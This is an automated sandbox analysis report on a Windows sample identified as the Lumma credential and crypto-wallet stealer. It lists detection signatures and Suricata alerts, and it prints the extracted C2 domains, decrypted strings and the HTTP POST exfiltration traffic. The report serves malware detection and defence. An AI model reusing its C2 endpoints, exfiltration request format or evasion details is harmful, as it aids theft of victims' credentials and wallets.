Edit tour

Windows Analysis Report
Bootstrapper.exe

Overview

General Information

Sample name:	Bootstrapper.exe
Analysis ID:	1581127
MD5:	ff6c56326f0ee63ca9360576a7449ff5
SHA1:	0ee6aa098523f43dcd93dedaab26b7a13f37aec7
SHA256:	aafa6952bb4c20240c67300a13ca97756ac5907f2abfbad9b76a6377605e3bf4
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Bootstrapper.exe (PID: 5416 cmdline: "C:\Users\user\Desktop\Bootstrapper.exe" MD5: FF6C56326F0EE63CA9360576A7449FF5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hummskitnj.buzz", "dxkushha.com", "inherineau.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "scentniej.buzz", "rebuildeso.buzz", "screwamusresz.buzz"], "Build id": "HpOoIh--2a727a032c4d"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2502138943.00000000016BB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2480224915.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Bootstrapper.exe PID: 5416	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Bootstrapper.exe PID: 5416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Bootstrapper.exe PID: 5416	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T03:36:10.657013+0100	2028371	3	Unknown Traffic	192.168.2.4	49753	104.21.80.1	443	TCP
2024-12-27T03:36:12.842618+0100	2028371	3	Unknown Traffic	192.168.2.4	49759	104.21.80.1	443	TCP
2024-12-27T03:36:15.209779+0100	2028371	3	Unknown Traffic	192.168.2.4	49766	104.21.80.1	443	TCP
2024-12-27T03:36:18.283975+0100	2028371	3	Unknown Traffic	192.168.2.4	49775	104.21.80.1	443	TCP
2024-12-27T03:36:20.791685+0100	2028371	3	Unknown Traffic	192.168.2.4	49782	104.21.80.1	443	TCP
2024-12-27T03:36:23.820777+0100	2028371	3	Unknown Traffic	192.168.2.4	49788	104.21.80.1	443	TCP
2024-12-27T03:36:26.074730+0100	2028371	3	Unknown Traffic	192.168.2.4	49794	104.21.80.1	443	TCP
2024-12-27T03:36:28.695448+0100	2028371	3	Unknown Traffic	192.168.2.4	49801	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T03:36:11.439483+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49753	104.21.80.1	443	TCP
2024-12-27T03:36:13.648154+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49759	104.21.80.1	443	TCP
2024-12-27T03:36:29.471988+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49801	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T03:36:11.439483+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49753	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T03:36:13.648154+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49759	104.21.80.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T03:36:16.902979+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.80.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "dxkushha.com", "inherineau.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "scentniej.buzz", "rebuildeso.buzz", "screwamusresz.buzz"], "Build id": "HpOoIh--2a727a032c4d"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for sample

Source: Bootstrapper.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: dxkushha.com
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmp	String decryptor: HpOoIh--2a727a032c4d

Source: Bootstrapper.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49801 version: TLS 1.2

Source: Bootstrapper.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Admin\Workspace\3927856\Project\Release\Project.pdb source: Bootstrapper.exe

Source: C:\Users\user\Desktop\Bootstrapper.exe

Code function: 0_2_00795070 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,

0_2_00795070

Source: C:\Users\user\Desktop\Bootstrapper.exe

Code function: 4x nop then mov ecx, edi

0_2_007C5570

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49753 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49753 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49766 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49759 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49759 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49801 -> 104.21.80.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: dxkushha.com
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz

Source: Joe Sandbox View

IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49782 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49775 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49801 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49788 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49794 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dxkushha.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: dxkushha.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7HM2AQP1HVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18122Host: dxkushha.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2A1X3JYWD4641FBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: dxkushha.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2RNF2ZJJLTQPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20408Host: dxkushha.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QU6DXMH6BWG9JUMVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1215Host: dxkushha.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PJW7FN57LZBCQB0W8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1112Host: dxkushha.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: dxkushha.com

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: dxkushha.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dxkushha.com

Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Bootstrapper.exe, 00000000.00000003.2480408350.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542183381.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.00000000016BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Bootstrapper.exe, Bootstrapper.exe, 00000000.00000003.2480264844.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2551636305.000000000290B000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542317548.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com/
Source: Bootstrapper.exe, 00000000.00000003.2480264844.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542317548.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2503001835.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com/D
Source: Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com/L
Source: Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com/Z
Source: Bootstrapper.exe, 00000000.00000003.2549705000.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542317548.000000000165A000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2446824381.000000000291B000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2503001835.000000000165B000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2446910419.000000000291F000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550534910.000000000165B000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550627340.0000000001695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com/api
Source: Bootstrapper.exe, 00000000.00000003.2446824381.000000000291B000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2446910419.000000000291F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com/apimpQ
Source: Bootstrapper.exe, 00000000.00000003.2502138943.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502922572.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2480224915.00000000016FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com/apivd
Source: Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com/g
Source: Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com/rG
Source: Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com/t
Source: Bootstrapper.exe, 00000000.00000003.2541980886.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2503001835.000000000167C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dxkushha.com:443/api
Source: Bootstrapper.exe, 00000000.00000003.2394578963.0000000002963000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Bootstrapper.exe, 00000000.00000003.2424014383.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394723847.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394578963.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Bootstrapper.exe, 00000000.00000003.2394723847.0000000002935000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Bootstrapper.exe, 00000000.00000003.2424014383.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394723847.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394578963.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
